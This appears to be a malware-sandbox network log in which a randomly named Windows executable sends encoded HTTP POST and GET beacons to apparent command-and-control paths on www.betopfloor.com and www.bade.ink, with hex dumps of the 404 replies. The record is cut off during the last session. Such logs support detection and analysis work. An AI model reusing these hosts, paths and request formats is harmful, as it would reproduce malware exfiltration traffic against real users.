                                May 28, 2024 07:18:02.251430035 CEST1236INData Raw: 23 06 59 f2 f0 d3 3a 38 d6 e1 50 bb de 46 46 b7 2c 79 13 c3 eb 75 2c de 42 97 c2 94 0d 7e ca ef ce d4 fc 46 da 3e 63 a3 84 03 87 6c 70 70 13 cd 94 f3 29 5a 76 13 0c 5e b2 55 09 1a 0f 04 36 41 2d 8c a4 36 a7 16 95 33 11 59 c6 0f e1 5a 90 32 c3 89
                                Data Ascii: #Y:8PFF,yu,B~F>clpp)Zv^U6A-63YZ2Zsc]1Z *[SiXCY^WQCbK~+n:)@UP7RpWO~b!/r@l-ElQK$gYzKoFfKl]D
                                May 28, 2024 07:18:02.251439095 CEST19INData Raw: d1 84 d2 26 3c 14 ae 64 4b ff 17 cc cb 70 7c 28 2e 00 00
                                Data Ascii: &<dKp|(.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                42192.168.2.649754108.179.192.228801364C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                TimestampBytes transferredDirectionData
                                May 28, 2024 07:18:04.253452063 CEST767OUTPOST /qy3g/ HTTP/1.1
                                Host: www.betopfloor.com
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Accept-Encoding: gzip, deflate, br
                                Connection: close
                                Cache-Control: no-cache
                                Content-Type: application/x-www-form-urlencoded
                                Content-Length: 234
                                Origin: http://www.betopfloor.com
                                Referer: http://www.betopfloor.com/qy3g/
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                Data Raw: 6a 54 5a 50 70 3d 32 6f 58 6d 34 67 51 68 73 6f 6f 6c 30 2b 58 43 43 5a 49 76 38 51 64 74 4f 4e 67 6c 36 61 75 39 4b 2b 2f 4d 66 42 59 6a 51 45 35 32 6c 79 67 70 42 39 6f 6c 32 37 4f 49 75 32 6f 4c 30 49 2b 52 72 53 61 47 7a 32 4a 59 44 50 55 4c 54 55 4f 43 41 7a 66 79 41 49 35 6e 6f 46 6a 78 65 74 68 62 37 32 77 45 6f 54 2b 39 74 44 49 79 58 62 43 33 51 37 44 75 44 42 77 4c 35 77 59 6c 4e 70 6e 78 54 46 6c 61 44 47 69 57 72 70 32 50 75 37 30 4f 39 5a 76 4b 72 78 6d 74 38 62 61 72 6b 74 44 52 6a 2f 69 2f 6c 30 31 6b 4b 71 62 6e 48 55 6e 45 48 4b 72 72 45 47 69 75 2b 61 6b 36 79 39 6f 71 46 74 52 7a 46 62 6e 43 69 61 35 79 75 61 5a 50 67 52 66 4e 35 2b 75 6d 39 65 6d 54 6d 45 6d 64 46 77 3d 3d
                                Data Ascii: jTZPp=2oXm4gQhsool0+XCCZIv8QdtONgl6au9K+/MfBYjQE52lygpB9ol27OIu2oL0I+RrSaGz2JYDPULTUOCAzfyAI5noFjxethb72wEoT+9tDIyXbC3Q7DuDBwL5wYlNpnxTFlaDGiWrp2Pu70O9ZvKrxmt8barktDRj/i/l01kKqbnHUnEHKrrEGiu+ak6y9oqFtRzFbnCia5yuaZPgRfN5+um9emTmEmdFw==
                                May 28, 2024 07:18:04.753633976 CEST1236INHTTP/1.1 404 Not Found
                                Date: Tue, 28 May 2024 05:18:04 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Last-Modified: Thu, 15 Sep 2022 09:59:43 GMT
                                Accept-Ranges: bytes
                                Vary: Accept-Encoding
                                Content-Encoding: gzip
                                Content-Length: 4677
                                Content-Type: text/html
                                Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 52 6d 73 d3 c8 96 fe 0c bf e2 8c 73 67 80 aa d8 4a 26 61 76 b0 15 df 82 90 0c b9 05 24 9b 84 e5 4e 6d ed 52 6d e9 48 ea 49 ab 8f e8 6e d9 d6 4d cd fe f6 3d dd 92 5f 63 b8 70 77 0d b1 a5 7e 79 ce f3 16 ff f0 fa f2 f4 f6 f7 ab 33 28 5c a9 e0 ea c3 ab b7 17 a7 d0 eb 47 d1 c7 a3 d3 28 7a 7d fb 1a fe fe e6 f6 dd 5b 38 1c 1c c0 8d 33 32 71 51 74 f6 be 07 bd c2 b9 6a 18 45 b3 d9 6c 30 3b 1a 90 c9 a3 db eb 68 ee 51 0e fd b5 ee b1 6f c3 9d 41 ea d2 de f8 71 1c 86 cc 4b a5 ed c9 0e 80 c3 17 2f 5e b4 f7 7a fe d0 50 09 9d 9f f4 50 f7 60 f9 e4 31 50 a4 50 19 ca a4 c2 25 4a 5e 56 79 c0 98 67 3a 3a 3c e4 73 d0 7d e2 12 9d 00 7f ac 8f 9f 6b 39 3d e9 9d 92 76 a8 5d ff b6 a9 b0 07 49 fb 76 d2 73 38 77 91 1f 3e 82 a4 10 c6 a2 3b a9 5d d6 ff b5 07 d1 1a 9a 93 4e e1 f8 f8 e0 18 fa 70 f5 f2 b7 33 78 7f 79 0b e7 97 1f de bf 8e a3 76 ef f1 e3 47 fc 89 7f e8 f7 e1 65 9a c2 8d 92 29 c2 65 ed 2c f4 fb e3 76 cf 26 46 56 0e ac 49 96 02 12 4a 71 f0 c7 e7 1a 4d 33 48 a8 8c da c7 fe d1 e0 68 70 38 [TRUNCATED]
                                Data Ascii: RmssgJ&av$NmRmHInM=_cpw~y3(\G(z}[832qQtjEl0;hQoAqK/^zPP`1PP%J^Vyg::<s}k9=v]Ivs8w>;]Np3xyvGe)e,v&FVIJqM3Hhp8(a{8jotEI.6q^>YZQH]rBis_4:Jar!c(j):{{d!5Dh4+k5yUD$wZ}YQO,5I>i6<]2XpCMe^Wh2.|~l'|v,sTWdG'8RFOE>8.V?\~[KJzp=4LB)YyuFMYb;Cd5[&TWRd{/_lyoY'+G;G\?zJL9*~"P,EO$}(OW<2X!SSQrxOx"#DJMAP!3-uH26?<gR;1<]9G$Vp0sBQ=f%afQmB<qMZq0&VkI&;A}
                                May 28, 2024 07:18:04.753657103 CEST224INData Raw: 2a 6d a5 44 33 d4 a4 71 b1 99 49 63 79 2b 21 45 66 c8 7d ce 7e f9 e5 e0 60 b1 69 91 ef a6 ab dd a3 c9 f3 17 2f 7e 5d ec ba 42 9a b5 cd c3 17 bf 26 87 2f 56 43 53 84 7b 98 88 e4 2e 37 54 eb b4 bf 38 87 cf fd bf 11 0b 31 29 f2 c2 cf d5 1c 2c 29 99
                                Data Ascii: *mD3qIcy+!Ef}~`i/~]B&/VCS{.7T81),)V*RCx{k_hT!dnD3bxixqTHr2=-c/7UtoGc-'9_e$'(e66FANz=86CG
                                May 28, 2024 07:18:04.753674030 CEST1236INData Raw: 5d 5f 5f 5e 83 af 67 1f ae 5e fe 76 06 ef 2f 6f e1 fc f2 c3 fb d7 5b d8 5b 10 99 f8 fc 69 dd 8b 47 fe b3 da 5e 36 7c b9 f5 68 b9 37 2b 9a c5 2a df 28 8e c6 b1 80 44 09 6b 99 d8 bc 12 9a 33 ee 41 61 30 3b d9 1b 7f 2c 1a 10 25 5c 80 45 e4 ca 00 97
                                Data Ascii: ]__^g^v/o[[iG^6|h7+*(Dk3Aa0;,%\Errk;Y,Qh0TA3SdR$RLWwA7-JR40im%d@:,5Hea2<DAUq\/Y+'<Tm^cx)<7$`%k|+\r
                                May 28, 2024 07:18:04.753695011 CEST1236INData Raw: 39 99 74 f1 b5 4d 6a 3d 3b 15 37 b8 34 d0 d7 4f 96 15 19 27 b4 f3 03 d6 79 0c e0 92 27 2a e1 32 32 a5 6d 91 90 3d 33 0c 9b 08 8b 7d 8b da 4a 27 a7 d2 35 4b f8 a0 73 81 ee bd 5d 6c 54 3a 5f db 30 18 1a e1 89 59 df 32 36 46 38 49 da 6e 18 1f 47 a9
                                Data Ascii: 9tMj=;74O'y'*22m=3}J'5Ks]lT:_0Y26F8InG.6_dzUZq4"s5R4=(f'{c83C|$^J}gHplI[j[/G56#Bq$pN5-N60047a[a9ya4B0(H&S0
                                May 28, 2024 07:18:04.753711939 CEST1031INData Raw: 59 c2 7a 4b 6f 0b 46 b7 18 66 b3 4b 6c 96 5d 04 b7 44 0d 58 3e bf 2b a1 91 35 4f 6a 07 9a 1c cc 3c 97 75 1e 13 2e 4b 21 74 8e e9 e0 e9 ef 5b 1c b9 45 b6 56 0e 88 11 0d 87 e3 64 a2 70 11 9c e5 bc 93 10 8a 69 15 4a cd 8f a5 08 8e 3c db b4 a4 38 1e
                                Data Ascii: YzKoFfKl]DX>+5Oj<u.K!t[EVdpiJ<8)3~(9szG|o(X\v#S3fuHpi"S)*f.Tr#'eR7as UT[7-6-Y-BE*.y]


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                43192.168.2.649755108.179.192.228801364C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                TimestampBytes transferredDirectionData
                                May 28, 2024 07:18:06.781691074 CEST1780OUTPOST /qy3g/ HTTP/1.1
                                Host: www.betopfloor.com
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Accept-Encoding: gzip, deflate, br
                                Connection: close
                                Cache-Control: no-cache
                                Content-Type: application/x-www-form-urlencoded
                                Content-Length: 1246
                                Origin: http://www.betopfloor.com
                                Referer: http://www.betopfloor.com/qy3g/
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                Data Raw: 6a 54 5a 50 70 3d 32 6f 58 6d 34 67 51 68 73 6f 6f 6c 30 2b 58 43 43 5a 49 76 38 51 64 74 4f 4e 67 6c 36 61 75 39 4b 2b 2f 4d 66 42 59 6a 51 45 78 32 6c 48 30 70 41 61 63 6c 77 4c 4f 49 67 57 6f 4f 30 49 2b 51 72 53 53 43 7a 32 45 6e 44 4e 73 4c 63 56 75 43 52 69 66 79 4a 49 35 6e 68 6c 6a 68 52 4e 67 47 37 32 68 44 6f 54 75 39 74 44 49 79 58 61 79 33 55 75 33 75 46 42 77 4b 75 41 59 68 4a 70 6d 2f 54 46 63 74 44 47 32 67 72 64 4b 50 74 62 45 4f 34 72 48 4b 69 78 6d 56 35 62 61 4e 6b 73 2f 53 6a 2f 2b 46 6c 30 70 4b 4b 74 54 6e 44 41 71 4a 64 4f 33 41 52 32 71 53 35 4a 6c 61 2b 37 77 6b 64 38 78 65 44 70 6a 7a 76 61 74 57 71 2f 31 78 68 78 2b 77 73 35 6d 63 31 5a 65 47 7a 33 7a 4c 58 48 30 69 4a 31 33 58 4c 55 76 71 68 52 2f 4d 75 54 58 74 58 37 75 4c 5a 64 61 56 72 6d 30 79 39 2b 47 57 72 68 66 47 6b 76 64 78 54 7a 4e 36 55 73 2f 70 6c 4b 72 65 2b 57 38 33 49 7a 65 38 47 7a 72 65 65 36 47 5a 72 56 42 39 42 59 63 76 44 31 6f 54 33 32 55 36 70 71 6e 64 76 62 6d 44 46 4a 35 4a 2f 67 46 77 57 79 49 4a [TRUNCATED]
                                Data Ascii: jTZPp=2oXm4gQhsool0+XCCZIv8QdtONgl6au9K+/MfBYjQEx2lH0pAaclwLOIgWoO0I+QrSSCz2EnDNsLcVuCRifyJI5nhljhRNgG72hDoTu9tDIyXay3Uu3uFBwKuAYhJpm/TFctDG2grdKPtbEO4rHKixmV5baNks/Sj/+Fl0pKKtTnDAqJdO3AR2qS5Jla+7wkd8xeDpjzvatWq/1xhx+ws5mc1ZeGz3zLXH0iJ13XLUvqhR/MuTXtX7uLZdaVrm0y9+GWrhfGkvdxTzN6Us/plKre+W83Ize8Gzree6GZrVB9BYcvD1oT32U6pqndvbmDFJ5J/gFwWyIJXuePAkFrdUVnY9Mzg1Y61FS2G3oXtenAzISk4XsM7qWCxjpi9LRui0d8SJsMGXJA47gbyjjVL7Jtd7y79Fzdx0E/hY9C3CHLmHnvX55fOS4gGJrzm8wovYuxGmM02TZNGROcU1JW6TG3flagsVVHXjHl3FrqfMlB00gy04h5wwLvQ+KUWmtRE+LfNopWP9qe9PTmbwhbkoMwfj+f2B0Whbi1umIdio/YEz4wgquVS887qPLAFScY619rMyvfBi/DAGIW2lgc56PV1+lK63ZouKJQEAKqDSaM4/oyOjpiKukJnjJDQX6b0kiXQwZIFm6ImwBwz5TyUYhMwTd2gmW612obFIIaXIX80g9gzknGUS09hGVV/siaVgH7cxk5BpW9G7eF/yPjSwDXl5Z2aQ9M/U/+ZLtgfdWgX4Dr+2jmVLDO0w698ZY4db/IgwjC99D1869A3cQxOj16kK2nn1/o9uHq052qehxO5X6BR9gEcQV0Qi8HXcGgKBB1bCoNU8FzD8d/A1uV/e1F3ASQjT8u/ThDG6gMPeEF39shkFIa4Dp0SnIoJmPQR/LYhq2RqF0Yw7aFh2Q+9gxjgahYReJD2NXyQRLNzZKUXv+f63w4OPr4+/NO9fW/hSYy3Qgo3iuH0wd3zAF5qPeTcTJlNG2K2RMgrE+rWTqxVi [TRUNCATED]
                                May 28, 2024 07:18:07.330986977 CEST1236INHTTP/1.1 404 Not Found
                                Date: Tue, 28 May 2024 05:18:07 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Last-Modified: Thu, 15 Sep 2022 09:59:43 GMT
                                Accept-Ranges: bytes
                                Vary: Accept-Encoding
                                Content-Encoding: gzip
                                Content-Length: 4677
                                Content-Type: text/html
                                Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 52 6d 73 d3 c8 96 fe 0c bf e2 8c 73 67 80 aa d8 4a 26 61 76 b0 15 df 82 90 0c b9 05 24 9b 84 e5 4e 6d ed 52 6d e9 48 ea 49 ab 8f e8 6e d9 d6 4d cd fe f6 3d dd 92 5f 63 b8 70 77 0d b1 a5 7e 79 ce f3 16 ff f0 fa f2 f4 f6 f7 ab 33 28 5c a9 e0 ea c3 ab b7 17 a7 d0 eb 47 d1 c7 a3 d3 28 7a 7d fb 1a fe fe e6 f6 dd 5b 38 1c 1c c0 8d 33 32 71 51 74 f6 be 07 bd c2 b9 6a 18 45 b3 d9 6c 30 3b 1a 90 c9 a3 db eb 68 ee 51 0e fd b5 ee b1 6f c3 9d 41 ea d2 de f8 71 1c 86 cc 4b a5 ed c9 0e 80 c3 17 2f 5e b4 f7 7a fe d0 50 09 9d 9f f4 50 f7 60 f9 e4 31 50 a4 50 19 ca a4 c2 25 4a 5e 56 79 c0 98 67 3a 3a 3c e4 73 d0 7d e2 12 9d 00 7f ac 8f 9f 6b 39 3d e9 9d 92 76 a8 5d ff b6 a9 b0 07 49 fb 76 d2 73 38 77 91 1f 3e 82 a4 10 c6 a2 3b a9 5d d6 ff b5 07 d1 1a 9a 93 4e e1 f8 f8 e0 18 fa 70 f5 f2 b7 33 78 7f 79 0b e7 97 1f de bf 8e a3 76 ef f1 e3 47 fc 89 7f e8 f7 e1 65 9a c2 8d 92 29 c2 65 ed 2c f4 fb e3 76 cf 26 46 56 0e ac 49 96 02 12 4a 71 f0 c7 e7 1a 4d 33 48 a8 8c da c7 fe d1 e0 68 70 38 [TRUNCATED]
                                Data Ascii: RmssgJ&av$NmRmHInM=_cpw~y3(\G(z}[832qQtjEl0;hQoAqK/^zPP`1PP%J^Vyg::<s}k9=v]Ivs8w>;]Np3xyvGe)e,v&FVIJqM3Hhp8(a{8jotEI.6q^>YZQH]rBis_4:Jar!c(j):{{d!5Dh4+k5yUD$wZ}YQO,5I>i6<]2XpCMe^Wh2.|~l'|v,sTWdG'8RFOE>8.V?\~[KJzp=4LB)YyuFMYb;Cd5[&TWRd{/_lyoY'+G;G\?zJL9*~"P,EO$}(OW<2X!SSQrxOx"#DJMAP!3-uH26?<gR;1<]9G$Vp0sBQ=f%afQmB<qMZq0&VkI&;A}
                                May 28, 2024 07:18:07.331016064 CEST224INData Raw: 2a 6d a5 44 33 d4 a4 71 b1 99 49 63 79 2b 21 45 66 c8 7d ce 7e f9 e5 e0 60 b1 69 91 ef a6 ab dd a3 c9 f3 17 2f 7e 5d ec ba 42 9a b5 cd c3 17 bf 26 87 2f 56 43 53 84 7b 98 88 e4 2e 37 54 eb b4 bf 38 87 cf fd bf 11 0b 31 29 f2 c2 cf d5 1c 2c 29 99
                                Data Ascii: *mD3qIcy+!Ef}~`i/~]B&/VCS{.7T81),)V*RCx{k_hT!dnD3bxixqTHr2=-c/7UtoGc-'9_e$'(e66FANz=86CG
                                May 28, 2024 07:18:07.331034899 CEST1236INData Raw: 5d 5f 5f 5e 83 af 67 1f ae 5e fe 76 06 ef 2f 6f e1 fc f2 c3 fb d7 5b d8 5b 10 99 f8 fc 69 dd 8b 47 fe b3 da 5e 36 7c b9 f5 68 b9 37 2b 9a c5 2a df 28 8e c6 b1 80 44 09 6b 99 d8 bc 12 9a 33 ee 41 61 30 3b d9 1b 7f 2c 1a 10 25 5c 80 45 e4 ca 00 97
                                Data Ascii: ]__^g^v/o[[iG^6|h7+*(Dk3Aa0;,%\Errk;Y,Qh0TA3SdR$RLWwA7-JR40im%d@:,5Hea2<DAUq\/Y+'<Tm^cx)<7$`%k|+\r
                                May 28, 2024 07:18:07.331052065 CEST1236INData Raw: 39 99 74 f1 b5 4d 6a 3d 3b 15 37 b8 34 d0 d7 4f 96 15 19 27 b4 f3 03 d6 79 0c e0 92 27 2a e1 32 32 a5 6d 91 90 3d 33 0c 9b 08 8b 7d 8b da 4a 27 a7 d2 35 4b f8 a0 73 81 ee bd 5d 6c 54 3a 5f db 30 18 1a e1 89 59 df 32 36 46 38 49 da 6e 18 1f 47 a9
                                Data Ascii: 9tMj=;74O'y'*22m=3}J'5Ks]lT:_0Y26F8InG.6_dzUZq4"s5R4=(f'{c83C|$^J}gHplI[j[/G56#Bq$pN5-N60047a[a9ya4B0(H&S0
                                May 28, 2024 07:18:07.331068993 CEST1031INData Raw: 59 c2 7a 4b 6f 0b 46 b7 18 66 b3 4b 6c 96 5d 04 b7 44 0d 58 3e bf 2b a1 91 35 4f 6a 07 9a 1c cc 3c 97 75 1e 13 2e 4b 21 74 8e e9 e0 e9 ef 5b 1c b9 45 b6 56 0e 88 11 0d 87 e3 64 a2 70 11 9c e5 bc 93 10 8a 69 15 4a cd 8f a5 08 8e 3c db b4 a4 38 1e
                                Data Ascii: YzKoFfKl]DX>+5Oj<u.K!t[EVdpiJ<8)3~(9szG|o(X\v#S3fuHpi"S)*f.Tr#'eR7as UT[7-6-Y-BE*.y]


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                44192.168.2.649756108.179.192.228801364C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                TimestampBytes transferredDirectionData
                                May 28, 2024 07:18:09.316607952 CEST478OUTGET /qy3g/?5L0=2bCPy0&jTZPp=7q/G7U1VqeddkNflMKI5sgAtLetf9b28atPRKW5PTHlUqHsLUKcur6rUhXkF0p+A/GSL70VLC9tJc0iDQkT9IaJtmga1X/Il1jAXyheslQ8xXpmoQqjsBC9sonYkPfqEZQpcDiM= HTTP/1.1
                                Host: www.betopfloor.com
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Connection: close
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                May 28, 2024 07:18:09.834038019 CEST1236INHTTP/1.1 404 Not Found
                                Date: Tue, 28 May 2024 05:18:09 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Last-Modified: Thu, 15 Sep 2022 09:59:43 GMT
                                Accept-Ranges: bytes
                                Content-Length: 11816
                                Vary: Accept-Encoding
                                Content-Type: text/html
                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 20 70 72 6f 66 69 6c 65 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 50 41 47 45 20 4e 4f 54 20 46 4f 55 4e 44 3c 2f 74 69 74 6c 65 [TRUNCATED]
                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head profile="http://gmpg.org/xfn/11"> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>404 - PAGE NOT FOUND</title>... Add Slide Outs --><script src="http://code.jquery.com/jquery-3.3.1.min.js"></script> <script src="/cgi-sys/js/simple-expand.min.js"></script> <style type="text/css"> body{padding:0;margin:0;font-family:helvetica;} #container{margin:20px auto;width:868px;} #container #top404{background-image:url('/cgi-sys/images/404top_w.jpg');background-repeat:no-repeat;width:868px;height:168px;} #container #mid404{background-image:url('/cgi-sys/images/404mid.gif');background-repeat:repeat-y;width:868px;} #container #mid404 #gatorbottom{position:relative;left:
                                May 28, 2024 07:18:09.834083080 CEST1236INData Raw: 33 39 70 78 3b 66 6c 6f 61 74 3a 6c 65 66 74 3b 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 23 6d 69 64 34 30 34 20 23 78 78 78 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 70 61 64 64 69 6e 67 3a 34 30 70 78 20 33 39 37 70 78 20 31 30
                                Data Ascii: 39px;float:left;} #container #mid404 #xxx{float:left;padding:40px 397px 10px; margin: auto auto -10px auto} #container #mid404 #content{float:left;text-align:center;width:868px;} #container #mid404 #content #errorcode{f
                                May 28, 2024 07:18:09.834093094 CEST448INData Raw: 67 6e 3a 20 6c 65 66 74 3b 7d 0a 09 09 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 23 6d 69 64 34 30 34 20 23 63 6f 6e 74 65 6e 74 20 23 61 63 63 6f 72 64 69 6f 6e 20 6c 69 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 39 30 25 3b 7d 0a 20 20 20 20 20 20 20
                                Data Ascii: gn: left;} #container #mid404 #content #accordion li {font-size: 90%;} #container #mid404 #content #accordion p {font-size: 95%; text-align: left;} #container #mid404 #content #accordion h3 {font-weight: bold;} #contain
                                May 28, 2024 07:18:09.834105015 CEST1236INData Raw: 31 39 3b 7d 0a 09 09 20 20 2e 63 6f 64 65 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 65 35 65 35 65 35 3b 20 62 6f 72 64 65 72 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 65 64 65 31 64 31 3b 20 70 61 64 64 69 6e 67 3a 20 35 70
                                Data Ascii: 19;} .code { background-color: #e5e5e5; border: 2px solid #ede1d1; padding: 5px 5px 5px 5px; text-align: left;} .shell{border: 2px solid gray; background-color: black; color: white; text-align: left;} </style> </head>
                                May 28, 2024 07:18:09.834115028 CEST1236INData Raw: 74 61 63 63 65 73 73 2d 62 61 63 6b 75 70 20 61 6e 64 20 72 65 66 72 65 73 68 69 6e 67 20 74 68 65 20 73 69 74 65 20 74 6f 20 73 65 65 20 69 66 20 74 68 61 74 20 72 65 73 6f 6c 76 65 73 20 74 68 65 20 69 73 73 75 65 2e 3c 2f 70 3e 0a 09 09 09 09
                                Data Ascii: taccess-backup and refreshing the site to see if that resolves the issue.</p><p>It is also possible that you have inadvertently deleted your document root or the your account may need to be recreated. Either way, please contact your
                                May 28, 2024 07:18:09.834126949 CEST448INData Raw: 2f 45 78 61 6d 70 6c 65 2f 20 61 6e 64 20 74 68 65 20 6e 61 6d 65 73 20 61 72 65 20 63 61 73 65 2d 73 65 6e 73 69 74 69 76 65 2e 3c 2f 70 3e 0a 09 09 09 09 09 09 09 09 3c 68 34 3e 3c 75 3e 42 72 6f 6b 65 6e 20 49 6d 61 67 65 3c 2f 75 3e 3c 2f 68
                                Data Ascii: /Example/ and the names are case-sensitive.</p><h4><u>Broken Image</u></h4><p>When you have a missing image on your site you may see a box on your page with with a red <span style="color:#FF0000;"><strong>X</strong></span> wh
                                May 28, 2024 07:18:09.834137917 CEST1236INData Raw: 09 09 09 09 3c 70 3e 54 68 69 73 20 76 61 72 69 65 73 20 62 79 20 62 72 6f 77 73 65 72 2c 20 69 66 20 79 6f 75 20 64 6f 20 6e 6f 74 20 73 65 65 20 61 20 62 6f 78 20 6f 6e 20 79 6f 75 72 20 70 61 67 65 20 77 69 74 68 20 61 20 72 65 64 20 3c 73 70
                                Data Ascii: <p>This varies by browser, if you do not see a box on your page with a red <span style="color:#FF0000;"><strong>X</strong></span> try right clicking on the page, then select View Page Info, and goto the Media Tab.</p><blockquote
                                May 28, 2024 07:18:09.834150076 CEST1236INData Raw: 73 70 3b 3c 73 74 72 6f 6e 67 3e 53 65 74 74 69 6e 67 73 3c 2f 73 74 72 6f 6e 67 3e 20 26 67 74 3b 20 3c 73 74 72 6f 6e 67 3e 50 65 72 6d 61 6c 69 6e 6b 73 3c 2f 73 74 72 6f 6e 67 3e 20 28 4e 6f 74 65 20 74 68 65 20 63 75 72 72 65 6e 74 20 73 65
                                Data Ascii: sp;<strong>Settings</strong> &gt; <strong>Permalinks</strong> (Note the current setting. If you are using a custom structure, copy or save the custom structure somewhere.)</li><li>Select&nbsp; <strong>Default</strong>.</li>
                                May 28, 2024 07:18:09.834161043 CEST1236INData Raw: 09 23 20 45 6e 64 20 57 6f 72 64 50 72 65 73 73 0a 09 09 09 09 09 09 09 09 09 3c 2f 70 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 3c 70 3e 49 66 20 79 6f 75 72 20 62 6c 6f 67 20 69 73 20 73 68 6f 77 69 6e 67 20
                                Data Ascii: # End WordPress</p></div><p>If your blog is showing the wrong domain name in links, redirecting to another site, or is missing images and style, these are all usually related to the same problem: you have the wron
                                May 28, 2024 07:18:09.834172964 CEST104INData Raw: 3c 6c 69 3e 45 64 69 74 20 74 68 65 20 66 69 6c 65 20 6f 6e 20 79 6f 75 72 20 63 6f 6d 70 75 74 65 72 20 61 6e 64 20 75 70 6c 6f 61 64 20 69 74 20 74 6f 20 74 68 65 20 73 65 72 76 65 72 20 76 69 61 20 46 54 50 3c 2f 6c 69 3e 0a 09 09 09 09 09 09
                                Data Ascii: <li>Edit the file on your computer and upload it to the server via FTP</li><li>Use an FTP pro
                                May 28, 2024 07:18:09.839232922 CEST1236INData Raw: 67 72 61 6d 27 73 20 45 64 69 74 20 4d 6f 64 65 3c 2f 6c 69 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 6c 69 3e 55 73 65 20 53 53 48 20 61 6e 64 20 61 20 74 65 78 74 20 65 64 69 74 6f 72 3c 2f 6c 69 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 6c 69 3e 55
                                Data Ascii: gram's Edit Mode</li><li>Use SSH and a text editor</li><li>Use the File Manager in cPanel</li></ul><p>The easiest way to edit a .htaccess file for most people is through the File Manager in cPanel.</p>


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                45192.168.2.649757149.88.84.60801364C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                TimestampBytes transferredDirectionData
                                May 28, 2024 07:18:15.208739996 CEST725OUTPOST /hsw0/ HTTP/1.1
                                Host: www.bade.ink
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Accept-Encoding: gzip, deflate, br
                                Connection: close
                                Cache-Control: no-cache
                                Content-Type: application/x-www-form-urlencoded
                                Content-Length: 210
                                Origin: http://www.bade.ink
                                Referer: http://www.bade.ink/hsw0/
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
